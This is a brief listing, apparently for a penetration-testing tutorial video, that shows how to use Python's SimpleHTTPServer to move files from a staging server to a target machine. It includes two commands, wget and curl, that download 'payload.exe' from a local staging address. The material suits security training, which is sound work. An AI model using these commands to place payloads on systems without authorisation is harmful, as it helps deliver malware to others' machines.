Use Python to Quickly and Easily Transfer files
Professor K
Use Python to Quickly and Easily Transfer files
Using Python’s SimpleHTTPServer module, we can easily and quickly transfer files from our staging server to a target machine somewhere on our network. Of course, for this to happen, you would need Python available on your staging server.
Commands used to transfer files: wget 192.168.56.123:8000/payload.exe curl -L -O http://192.168.56.123:8000/payload.exe ... https://www.youtube.com/watch?v=xjmXrr2lKxY
2021-11-09
0.0 LBC
Copyrighted (contact publisher)
17780893 Bytes